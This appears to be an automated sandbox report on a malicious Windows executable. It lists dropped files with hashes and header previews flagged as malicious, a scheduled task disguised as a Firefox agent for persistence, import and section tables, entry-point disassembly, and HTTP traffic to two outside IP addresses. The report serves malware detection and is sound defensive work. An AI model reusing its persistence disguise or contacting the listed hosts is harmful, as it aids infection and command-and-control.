                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    00:10:59Task SchedulerRun new task: Firefox Default Browser Agent F98CC62F1FC24C40 path: C:\Users\user\AppData\Roaming\dfhwrav
                    00:12:07API Interceptor1x Sleep call for process: 5AF.exe modified
                    00:12:20API Interceptor1x Sleep call for process: WerFault.exe modified
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.946006514417489
                    Encrypted:false
                    SSDEEP:192:cfiw0oXVHqqBIKjed+Mb/u7s9S274ItWc:UimXFqqBIKjet/u7s9X4ItWc
                    MD5:D7A37DE7937004741090755840C56D79
                    SHA1:08CE77055D65D3FB07F4642E33D2F2FE9FA7F068
                    SHA-256:E9915E6CFE487068FD5A96B376F5EE8D9DAAE0D1E992844CF29320ED14B2E658
                    SHA-512:57B5F8721B439B74F09FA5700C08ACE11645FE3D0342F8FEC4D13350A6C1F7971E92B369FF069AA3D6CDE41CDE4039F46A7C5B3088E92CEBF312EDB776A268AA
                    Malicious:false
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.6.9.5.2.8.0.7.9.9.5.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.6.9.5.3.7.8.7.6.8.1.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.6.e.d.c.e.-.2.6.8.1.-.4.f.d.2.-.9.a.6.a.-.7.2.1.4.6.1.a.2.3.d.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.2.8.e.0.b.f.-.c.0.3.d.-.4.f.d.c.-.9.7.6.0.-.5.b.4.d.1.c.4.7.b.3.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.1.a.-.0.a.1.3.-.f.9.5.d.9.3.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 08:12:12 2022, 0x1205a4 type
                    Category:dropped
                    Size (bytes):46956
                    Entropy (8bit):2.1379555772918506
                    Encrypted:false
                    SSDEEP:192:/WFLAtpZkO5SkbAR+TPZQfDx0+Kyrx+p9R6NnX:ikr5Lbw+T810+KyreW
                    MD5:52C8A7752FFF58EDBB70514842507A1C
                    SHA1:3EC49B493F90C8EFA19791C3B209ED0E12571597
                    SHA-256:D764C68A2933F74A24F55FC5A5F2196F21F480B45050B2453DE8A4E3414AA7B5
                    SHA-512:C5F9E6EF985783BD64DE5E8D710A5E3B8683F94B17E7FA26BA24FF212D59E29DAC1E91EF9B39E70424F1D60E378EBB16122C24E1E84864A4AF760F2C27AA393A
                    Malicious:false
                    Reputation:low
                    Preview:MDMP....... .......\..c........................D................/..........T.......8...........T...........................................................................................................U...........B......d.......GenuineIntelW...........T.......0...8..c............................. ..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8300
                    Entropy (8bit):3.685442373729347
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNibK6ha0ZD6Yqf6waEgmfTMSmDCprG89bxZdPsfezZFm:RrlsNiG6haID6YK6waEgmfTMSm8xz0f/
                    MD5:42BF5C06FE5E8831D8CE69305340AD29
                    SHA1:C7520BAB8F0C88EFBC5978AD7935EC96D2302F64
                    SHA-256:DB24A8015F5D0F08788DCF361FB862360309BF58424A46B40F171A6823F55AA0
                    SHA-512:BEC099C7C3A11EEF2C57EB72CD63A7CBD54B5AE8360AAB0619BC6BAFB015958C74635D087D9E4AE18F04C1BD0ADE0AB700DF3D4425FF877497AE0CCD2EDD9C87
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.>.......
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4640
                    Entropy (8bit):4.458377130044554
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zsZJgtWI9GgWgc8sqYjf8fm8M4JCdsFIAaFok+q8/RgEAd4SrSed:uITfrtZgrsqYQJvIakE1MDWed
                    MD5:D4368A447707DE8D83F7436078D8256F
                    SHA1:FDF53267338C0952A6E2DD6068F84231CD8EEAA8
                    SHA-256:2E04AD13C67C592A218330DD8EE0FAA5CE495AD4CA411ED5B137B7BBF20702EC
                    SHA-512:6501494A3D39F7D44802703508A10357AA32211B8BBA3C7F93766372132C2F8B8637ACD60B756E18A9A35E53BB1DC2E48407E248589F57E5ED77E86C8868B9E5
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802482" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):478208
                    Entropy (8bit):7.834422761413108
                    Encrypted:false
                    SSDEEP:6144:i+i6S2IYNFu4Ldu//tUVBcR3QQtZ2b6ptsDCsJnQAC+iVjQoFsLVCcde2Zq3mLW:q2IgEYKKq3QQWFCRX4ccdecU
                    MD5:C81AB83835C2669DBE57C43DB54571B7
                    SHA1:C06EE015340CBDFAA7AF2E820A8EE166179B09E2
                    SHA-256:727AC1966886E3D083330FCDE19D79C445DE9FE2A0E306F9FEB94D28BE54F776
                    SHA-512:4BA429D9A37D1A3B1C72029DB9D86E44B30DB40EB05CF8248CD6B7BC6CD332B25605B0A84CC6E63DA6F55191A0FA5D91B9C2610E2C30E232844C6AB37F0B0657
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L...%..b.............................L....... ....@.................................8...........................................P....p..P0...........................................................,..@...............<............................text............................... ..`.data....D... ......................@....rsrc...P0...p...2..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):3776000
                    Entropy (8bit):7.994112157171111
                    Encrypted:true
                    SSDEEP:98304:CIPeMtJl37YfXo0/PrjRkwoD8sOr+616vbgD7op:CIPeMh37YfXZPvRkww3OrNEgo
                    MD5:2479739C5D062ECB325147623241F007
                    SHA1:4394B6D2CA4ED82A5F2D70D10CD05CFA3B35AB2C
                    SHA-256:728DE9789AF5F2EBC9AC2FAC80FEE25B186BC5B3ACB960650934377F0C77726D
                    SHA-512:1C5C4D7D7FD5A7F18FED87A0D66B95B26EBFDA33B4AA4F66FD8FD4432E07EBC6E6289A27FFCCC1CF99E659AEB80434E833BAA299AB140D82C0BCB7D863A58301
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L......`......................<......L....... ....@.......................... O.......:.........................................P.....<.P0.................................................. -.......,..@...............<............................text............................... ..`.data.....;.. ...`8.................@....rsrc...PP....<..2...l9.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Local\Temp\ADCA.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4494336
                    Entropy (8bit):6.5734549407418505
                    Encrypted:false
                    SSDEEP:98304:2Ekp3AUUgGFofLw++PxAbc5rh5Ar/04TA4P:gp31UtFmLw95Abc5rh5Ar/NTA
                    MD5:AA90603343B982D2D28D56CCE94C696E
                    SHA1:8E1ED433C2958BDA927279C0D47C4C4B7C39290C
                    SHA-256:07F50A84E6567DF42216C4F1C640AEAC436B19340CCCB82B21EFAB2E1F9F3FB1
                    SHA-512:CEC1F4B745B0F2A54AF74C32E6F3631589D2795E1396FEB3E1C51198C16A985F871D915EC9F988F763A7774F96F76AA922D3BF9EF3195BD44443E633814A0B09
                    Malicious:true
                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c..................?.........X&?......0?...@..........................pE.......................................@......@@..9....E..d....................@.4A...................................................J@.......@......................text.....>.......>................. ..`.itext..t.....?.......>............. ..`.data.......0?.......?.............@....bss....Tg....?..........................idata...9...@@..:....?.............@....didata.......@.......?.............@....edata........@.......?.............@..@.rdata..D.....@.......?.............@..@.reloc..4A....@..B....?.............@..B.rsrc....d....E..d...0D.............@..@.............pE.......D.............@..@........................................................
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):149504
                    Entropy (8bit):7.100027517135632
                    Encrypted:false
                    SSDEEP:3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                    MD5:1CF06BEB83D2BD1AFD1B9B62994E7549
                    SHA1:88BD7DA7668FB669B5503696EE0A9C0F2DBECEB7
                    SHA-256:4DC0DE570728F75F844C7AFB84AC6C809EF4620DAC3B12A884FF9916F5B5B0EE
                    SHA-512:79196551EDCB7850817C3132971D25423BD6861849E21926E03647B0D4EE76D3EE7CBE456C78D046167F196991E3D286C393A8ABC22E8218ED148BC90090FFD9
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....5a.............................L....... ....@.................................#...........................................P....p..P0...........................................................,..@...............<............................text............................... ..`.data...hB... ......................@....rsrc...P0...p...2..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.100027517135632
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:149504
                    MD5:1cf06beb83d2bd1afd1b9b62994e7549
                    SHA1:88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
                    SHA256:4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
                    SHA512:79196551edcb7850817c3132971d25423bd6861849e21926e03647b0d4ee76d3ee7cbe456c78d046167f196991e3d286c393a8abc22e8218ed148bc90090ffd9
                    SSDEEP:3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                    TLSH:02E3D0013690E072C19348755931C2F17B3BBA32E8B9894B7B5446AF4F722D2BB3674B
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....5a...........
                    Icon Hash:d0b4b0e0e0eaf0c0
                    Entrypoint:0x404c97
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x61352E95 [Sun Sep 5 20:54:45 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2ac0f7085258eff31142b9f87cb0f218
                    Instruction
                    call 00007F9AF0E4AECCh
                    jmp 00007F9AF0E450ADh
                    sub eax, 000003A4h
                    je 00007F9AF0E45254h
                    sub eax, 04h
                    je 00007F9AF0E45249h
                    sub eax, 0Dh
                    je 00007F9AF0E4523Eh
                    dec eax
                    je 00007F9AF0E45235h
                    xor eax, eax
                    ret
                    mov eax, 00000404h
                    ret
                    mov eax, 00000412h
                    ret
                    mov eax, 00000804h
                    ret
                    mov eax, 00000411h
                    ret
                    mov edi, edi
                    push esi
                    push edi
                    mov esi, eax
                    push 00000101h
                    xor edi, edi
                    lea eax, dword ptr [esi+1Ch]
                    push edi
                    push eax
                    call 00007F9AF0E4643Eh
                    xor eax, eax
                    movzx ecx, ax
                    mov eax, ecx
                    mov dword ptr [esi+04h], edi
                    mov dword ptr [esi+08h], edi
                    mov dword ptr [esi+0Ch], edi
                    shl ecx, 10h
                    or eax, ecx
                    lea edi, dword ptr [esi+10h]
                    stosd
                    stosd
                    stosd
                    mov ecx, 004219A8h
                    add esp, 0Ch
                    lea eax, dword ptr [esi+1Ch]
                    sub ecx, esi
                    mov edi, 00000101h
                    mov dl, byte ptr [ecx+eax]
                    mov byte ptr [eax], dl
                    inc eax
                    dec edi
                    jne 00007F9AF0E45229h
                    lea eax, dword ptr [esi+0000011Dh]
                    mov esi, 00000100h
                    mov dl, byte ptr [eax+ecx]
                    mov byte ptr [eax], dl
                    inc eax
                    dec esi
                    jne 00007F9AF0E45229h
                    pop edi
                    pop esi
                    ret
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    sub esp, 0000051Ch
                    mov eax, dword ptr [004225B0h]
                    xor eax, ebp
                    mov dword ptr [ebp-04h], eax
                    push ebx
                    push edi
                    lea eax, dword ptr [ebp-00000518h]
                    push eax
                    push dword ptr [esi+04h]
                    call dword ptr [00401170h]
                    mov edi, 00000100h
                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x10a9c0x50.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x3050.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd80x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x23c.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x107d40x10800False0.5119702888257576data6.1002379149502355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x120000x442680x10a00False0.9444313909774437data7.840969501400703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x570000x30500x3200False0.62859375data5.648259802287169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    JEBOPOZUSUHARAFA0x594300x55fASCII text, with very long lines (1375), with no line terminatorsRaeto-RomanceSwitzerland
                    RT_ICON0x572b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x579780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x57ee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                    RT_ICON0x58f880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                    RT_STRING0x59b780x2d8dataRaeto-RomanceSwitzerland
                    RT_STRING0x59e500x1fcdataRaeto-RomanceSwitzerland
                    RT_ACCELERATOR0x599900xa0dataRaeto-RomanceSwitzerland
                    RT_GROUP_ICON0x593f00x3edataRaeto-RomanceSwitzerland
                    RT_VERSION0x59a300x148x86 executable not stripped
                    DLLImport
                    KERNEL32.dllOpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
                    GDI32.dllGetCharWidthA, GetCharABCWidthsA
                    WINHTTP.dllWinHttpSetOption
                    Language of compilation systemCountry where language is spokenMap
                    Raeto-RomanceSwitzerland
                    TimestampSource PortDest PortSource IPDest IP
                    Nov 30, 2022 00:10:58.035403967 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:58.229374886 CET8049719200.46.66.71192.168.2.6
                    Nov 30, 2022 00:10:58.229625940 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:58.231497049 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:58.231524944 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:58.421336889 CET8049719200.46.66.71192.168.2.6
                    Nov 30, 2022 00:10:59.088948011 CET8049719200.46.66.71192.168.2.6
                    Nov 30, 2022 00:10:59.088963032 CET8049719200.46.66.71192.168.2.6
                    Nov 30, 2022 00:10:59.089210033 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:59.089210033 CET4971980192.168.2.6200.46.66.71
                    Nov 30, 2022 00:10:59.284754992 CET8049719200.46.66.71192.168.2.6
                    Nov 30, 2022 00:10:59.588172913 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:10:59.871526003 CET8049721211.59.14.90192.168.2.6
                    Nov 30, 2022 00:10:59.875227928 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:10:59.875227928 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:10:59.878920078 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:00.162935019 CET8049721211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:01.062212944 CET8049721211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:01.062257051 CET8049721211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:01.062350035 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:01.062437057 CET4972180192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:01.345091105 CET8049721211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:01.563965082 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:01.758471966 CET8049722200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:01.758625984 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:01.770284891 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:01.770348072 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:01.964965105 CET8049722200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:03.587111950 CET8049722200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:03.587126970 CET8049722200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:03.587363958 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:03.587455988 CET4972280192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:03.620733023 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:03.785115004 CET8049722200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:03.808873892 CET8049723200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:03.811898947 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:03.812041044 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:03.813934088 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:04.007215977 CET8049723200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:04.692003965 CET8049723200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:04.692301035 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:04.697622061 CET8049723200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:04.697813034 CET4972380192.168.2.6200.46.66.71
                    Nov 30, 2022 00:11:04.730303049 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:04.877301931 CET8049723200.46.66.71192.168.2.6
                    Nov 30, 2022 00:11:05.019064903 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:05.019351006 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:05.019576073 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:05.019609928 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:05.307938099 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213625908 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213686943 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213804007 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:06.220859051 CET4972480192.168.2.6211.59.14.90
